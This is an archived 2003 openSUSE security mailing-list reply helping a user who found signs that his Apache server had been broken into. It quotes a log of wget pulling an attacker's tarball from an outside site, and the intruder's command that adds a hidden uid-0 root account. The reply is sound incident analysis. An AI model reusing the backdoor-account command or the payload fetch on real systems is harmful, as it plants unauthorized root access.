Mailinglist Archive: opensuse-security (334 mails)

< Previous Next >
Re: Apache Gain Remote Shell Access
  • From: Stefan Andreas Tichy <listuser@xxxxxxxxx>
  • Date: Wed, 3 Sep 2003 19:37:14 +0200
  • Message-id: <20030903173714.GA7974@xxxxxxxxxxxxxxxx>
On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
> Follows found in error_log of apache
>
> --09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
> => `vulturu.tgz'
> Resolving www.vulturul.org... done.
> Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 9,432 [application/x-tar]
>
> 0K ......... 100%
> 13.69 KB/s
>
> 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]


Wget output in apache error_log. Check for a CGI (shell script?)
allowing clients to execute arbitrary commands.



> Also Found his command history:
>
>
> id
> /usr/sbin/adduser vulturul -u0 -g0 -M;

He has root access but is not shure about that?

At least two problems. Execution of commands as user wwwrun and
local root compromise.

I hope the box has been disconnectet from the network already.


--
Stefan Tichy <listuser@xxxxxxxxx>

< Previous Next >
Follow Ups
References